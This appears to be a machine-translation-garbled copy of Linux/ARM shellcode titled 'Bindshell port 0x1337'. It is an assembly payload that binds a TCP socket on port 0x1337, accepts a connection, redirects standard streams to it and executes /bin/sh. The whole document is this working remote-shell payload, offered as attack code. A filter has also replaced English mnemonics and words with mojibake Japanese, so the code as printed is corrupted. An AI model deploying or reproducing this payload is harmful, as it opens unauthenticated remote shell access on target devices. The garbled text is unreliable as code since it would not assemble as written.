Linux/ARM - Bindshell port 0x1337

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
/*
 * ¸ª½ñ¤òÍ¿¤¨¤ë: arm-ÃùÂ¢½êd-listen
 * ´Ê·é¤Ê¡¿Í×Ìó¤¹¤ë: ÃùÂ¢½êd a Çú·â¤¹¤ë to port 0x1337 on any ÃÏ¸µ¤Î ±éÀâ¡Ê¤¹¤ë¡Ë¡¿½»½ê and
 *        wait for ´Ø·¸s
 * Author: Daniel Godas-Lopez <gmail account dgodas>
 */
 
    /*
      soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
     */
 
    mov %r0, $2     /* AF_INET */
    mov %r1, $1     /* SOCK_STREAM */
    mov %r2, $6     /* IPPRTOTO_TCP */
    ²¡¤·¿Ê¤á¤ë {%r0, %r1, %r2}
    mov %r0, $1     /* socket */
    mov %r1, %sp
    svc 0x00900066
    ÄÉ²Ã¤¹¤ë %sp, %sp, $12
 
    mov %r6, %r0        /* r6 = soc_des */
 
    /*
      ÃùÂ¢½êd(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
     */
 
.if 0 /* r0 == r6 already */
    mov %r0, %r6        /* soc_des */
.endif
 
    mov %r1, $0x37
    mov %r7, $0x13
    mov %r1, %r1, lsl $24
    ÄÉ²Ã¤¹¤ë %r1, %r7, lsl $16
    ÄÉ²Ã¤¹¤ë %r1, $2     /* port = 0x1337, family = 2 (AF_INET) */
    sub %r2, %r2, %r2   /* addr = 0.0.0.0 */
    ²¡¤·¿Ê¤á¤ë {%r1, %r2}
    mov %r1, %sp        /* pointer to sockaddr_in */
    mov %r2, $16        /* sizeof(struct sockaddr_in) */
     
    ²¡¤·¿Ê¤á¤ë {%r0, %r1, %r2}
    mov %r0, $2     /* ÃùÂ¢½êd */
    mov %r1, %sp
    svc 0x00900066
    ÄÉ²Ã¤¹¤ë %sp, %sp, $20
 
    /*
      listen(soc_des, 1);
     /*
 
    mov %r1, $1     /* backlog (see man 2 listen) */
    mov %r0, %r6        /* soc_des */
    ²¡¤·¿Ê¤á¤ë {%r0, %r1}
    mov %r0, $4     /* listen */
    mov %r1, %sp
    svc 0x00900066
    ÄÉ²Ã¤¹¤ë %sp, $8
 
    /*
      soc_cli = ¼õÂ÷¤¹¤ë(soc_des, 0, 0);
     */
 
    mov %r0, %r6        /* soc_des */
    sub %r1, %r1, %r1
    sub %r2, %r2, %r2
    ²¡¤·¿Ê¤á¤ë {%r0, %r1, %r2}
    mov %r0, $5     /* ¼õÂ÷¤¹¤ë */
    mov %r1, %sp
    svc 0x00900066
    ÄÉ²Ã¤¹¤ë %sp, %sp, $12
 
    mov %r6, %r0        /* r6 = soc_cli */
 
    /*
      dup2(soc_cli,0);
      dup2(soc_cli,1);
      dup2(soc_cli,2);
     */
    mov %r1, $2
1:  mov %r0, %r6
    svc 0x0090003f
    subs %r1, %r1, $1
    bpl 1b
 
    /*
      execve("/ÃùÂ¢½ê/sh", parms, env);
     */
 
    sub %r1, %sp, $4    /* argv[0] = "sh" */
    sub %r2, %r2, %r2   /* argv[1] = 0x00000000 */
    mov %r3, $0x2f
    mov %r7, $0x62
    ÄÉ²Ã¤¹¤ë %r3, %r7, lsl $8
    mov %r7, $0x69
    ÄÉ²Ã¤¹¤ë %r3, %r7, lsl $16
    mov %r7, $0x6e
    ÄÉ²Ã¤¹¤ë %r3, %r7, lsl $24   /* '/'  'b'  'i'  'n'  */
    mov %r4, $0x2f
    mov %r7, $0x73
    ÄÉ²Ã¤¹¤ë %r4, %r7, lsl $8
    mov %r7, $0x68
    ÄÉ²Ã¤¹¤ë %r4, %r7, lsl $16   /* '/'  's'  'h'  0x00 */
    mov %r5, $0x73
    mov %r7, $0x68
    ÄÉ²Ã¤¹¤ë %r5, %r7, lsl $8    /* 's'  'h'  0x00 0x00 */
 
    ²¡¤·¿Ê¤á¤ë {%r1, %r2, %r3, %r4, %r5}
 
    ÄÉ²Ã¤¹¤ë %r0, %sp, $8    /* filename ptr */
    ÄÉ²Ã¤¹¤ë %r1, %sp, $0    /* argv ptr */
    ÄÉ²Ã¤¹¤ë %r2, %sp, $4    /* env ptr */
 
    svc 0x0090000b